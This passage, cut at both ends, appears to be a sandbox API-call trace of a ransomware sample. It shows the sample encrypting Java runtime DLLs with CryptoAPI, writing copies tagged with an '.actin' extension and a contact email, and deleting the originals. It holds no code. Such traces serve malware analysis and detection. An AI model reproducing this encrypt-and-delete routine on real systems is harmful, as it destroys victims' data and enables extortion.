(in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2df0) returned 1 [0149.341] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0149.341] ReadFile (in: hFile=0x308, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xfa840, lpOverlapped=0x0) returned 1 [0149.526] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xfa850, dwBufLen=0xfa850 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xfa850) returned 1 [0149.528] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xfa850, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xfa850, lpOverlapped=0x0) returned 1 [0149.545] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac30b0) returned 1 [0149.545] CryptSetKeyParam (hKey=0xac30b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0149.545] CryptEncrypt (in: hKey=0xac30b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0149.545] CryptDestroyKey (hKey=0xac30b0) returned 1 [0149.545] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0149.545] CryptDestroyKey (hKey=0xac2df0) returned 1 [0149.545] CloseHandle (hObject=0x308) returned 1 [0149.545] CloseHandle (hObject=0x2f8) returned 1 [0149.545] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\deployjava1.dll")) returned 1 [0149.554] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0149.554] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0149.555] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=29760) returned 1 [0149.555] CloseHandle (hObject=0x2f8) returned 1 [0149.555] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll")) returned 0x20 [0149.555] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.555] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0149.555] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0149.555] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0149.555] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0149.555] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3470) returned 1 [0149.555] CryptSetKeyParam (hKey=0xac3470, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0149.555] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x7440, lpOverlapped=0x0) returned 1 [0149.754] CryptEncrypt (in: hKey=0xac3470, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x7450, dwBufLen=0x7450 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x7450) returned 1 [0149.754] WriteFile (in: hFile=0x308, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x7450, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x7450, lpOverlapped=0x0) returned 1 [0149.756] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2d30) returned 1 [0149.756] CryptSetKeyParam (hKey=0xac2d30, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0149.756] CryptEncrypt (in: hKey=0xac2d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0149.756] CryptDestroyKey (hKey=0xac2d30) returned 1 [0149.756] WriteFile (in: hFile=0x308, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0149.756] CryptDestroyKey (hKey=0xac3470) returned 1 [0149.756] CloseHandle (hObject=0x2f8) returned 1 [0149.756] CloseHandle (hObject=0x308) returned 1 [0149.756] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_shmem.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_shmem.dll")) returned 1 [0149.757] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0149.757] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0149.758] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=136256) returned 1 [0149.758] CloseHandle (hObject=0x308) returned 1 [0149.758] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll")) returned 0x20 [0149.758] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.758] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0149.758] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0149.758] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0149.758] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0149.758] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2d30) returned 1 [0149.759] CryptSetKeyParam (hKey=0xac2d30, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0149.759] ReadFile (in: hFile=0x308, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x21440, lpOverlapped=0x0) returned 1 [0149.764] CryptEncrypt (in: hKey=0xac2d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x21450, dwBufLen=0x21450 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x21450) returned 1 [0149.764] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x21450, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x21450, lpOverlapped=0x0) returned 1 [0149.767] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2d70) returned 1 [0149.767] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0149.767] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0149.767] CryptDestroyKey (hKey=0xac2d70) returned 1 [0149.767] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0149.767] CryptDestroyKey (hKey=0xac2d30) returned 1 [0149.767] CloseHandle (hObject=0x308) returned 1 [0149.767] CloseHandle (hObject=0x2f8) returned 1 [0149.767] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\eula.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\eula.dll")) returned 1 [0149.769] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0149.769] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0149.770] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=274496) returned 1 [0149.770] CloseHandle (hObject=0x2f8) returned 1 [0149.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll")) returned 0x20 [0149.770] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0149.770] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0149.770] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0149.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0149.771] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2db0) returned 1 [0149.771] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0149.771] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x43040, lpOverlapped=0x0) returned 1 [0149.777] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x43050, dwBufLen=0x43050 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x43050) returned 1 [0149.777] WriteFile (in: hFile=0x308, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x43050, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x43050, lpOverlapped=0x0) returned 1 [0149.782] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2ff0) returned 1 [0149.782] CryptSetKeyParam (hKey=0xac2ff0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0149.782] CryptEncrypt (in: hKey=0xac2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0149.782] CryptDestroyKey (hKey=0xac2ff0) returned 1 [0149.782] WriteFile (in: hFile=0x308, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0149.782] CryptDestroyKey (hKey=0xac2db0) returned 1 [0149.782] CloseHandle (hObject=0x2f8) returned 1 [0149.783] CloseHandle (hObject=0x308) returned 1 [0149.783] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll")) returned 1 [0149.786] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0149.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0149.787] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=186944) returned 1 [0149.787] CloseHandle (hObject=0x308) returned 1 [0149.787] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll")) returned 0x20 [0149.787] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0149.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0149.787] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0149.787] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0149.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0149.787] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2ef0) returned 1 [0149.787] CryptSetKeyParam (hKey=0xac2ef0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0149.787] ReadFile (in: hFile=0x308, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x2da40, lpOverlapped=0x0) returned 1 [0150.029] CryptEncrypt (in: hKey=0xac2ef0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x2da50, dwBufLen=0x2da50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x2da50) returned 1 [0150.030] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x2da50, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x2da50, lpOverlapped=0x0) returned 1 [0150.033] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2d30) returned 1 [0150.033] CryptSetKeyParam (hKey=0xac2d30, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0150.033] CryptEncrypt (in: hKey=0xac2d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0150.033] CryptDestroyKey (hKey=0xac2d30) returned 1 [0150.033] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0150.033] CryptDestroyKey (hKey=0xac2ef0) returned 1 [0150.033] CloseHandle (hObject=0x308) returned 1 [0150.033] CloseHandle (hObject=0x2f8) returned 1 [0150.034] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll")) returned 1 [0150.036] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0150.036] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0150.037] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=619584) returned 1 [0150.037] CloseHandle (hObject=0x2f8) returned 1 [0150.037] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll")) returned 0x20 [0150.037] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0150.037] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0150.037] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0150.037] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0150.038] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0150.038] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2ef0) returned 1 [0150.038] CryptSetKeyParam (hKey=0xac2ef0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0150.038] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x97440, lpOverlapped=0x0) returned 1 [0150.050] CryptEncrypt (in: hKey=0xac2ef0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x97450, dwBufLen=0x97450 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x97450) returned 1 [0150.051] WriteFile (in: hFile=0x308, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x97450, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x97450, lpOverlapped=0x0) returned 1 [0150.061] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3130) returned 1 [0150.061] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0150.061] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0150.061] CryptDestroyKey (hKey=0xac3130) returned 1 [0150.061] WriteFile (in: hFile=0x308, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0150.061] CryptDestroyKey (hKey=0xac2ef0) returned 1 [0150.061] CloseHandle (hObject=0x2f8) returned 1 [0150.061] CloseHandle (hObject=0x308) returned 1 [0150.061] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll")) returned 1 [0150.239] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0150.240] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0150.434] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=158272) returned 1 [0150.434] CloseHandle (hObject=0x2e4) returned 1 [0150.434] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll")) returned 0x20 [0150.434] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0150.434] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\hprof.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\hprof.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0150.434] SetFilePointerEx (in: hFile=0x2e4, 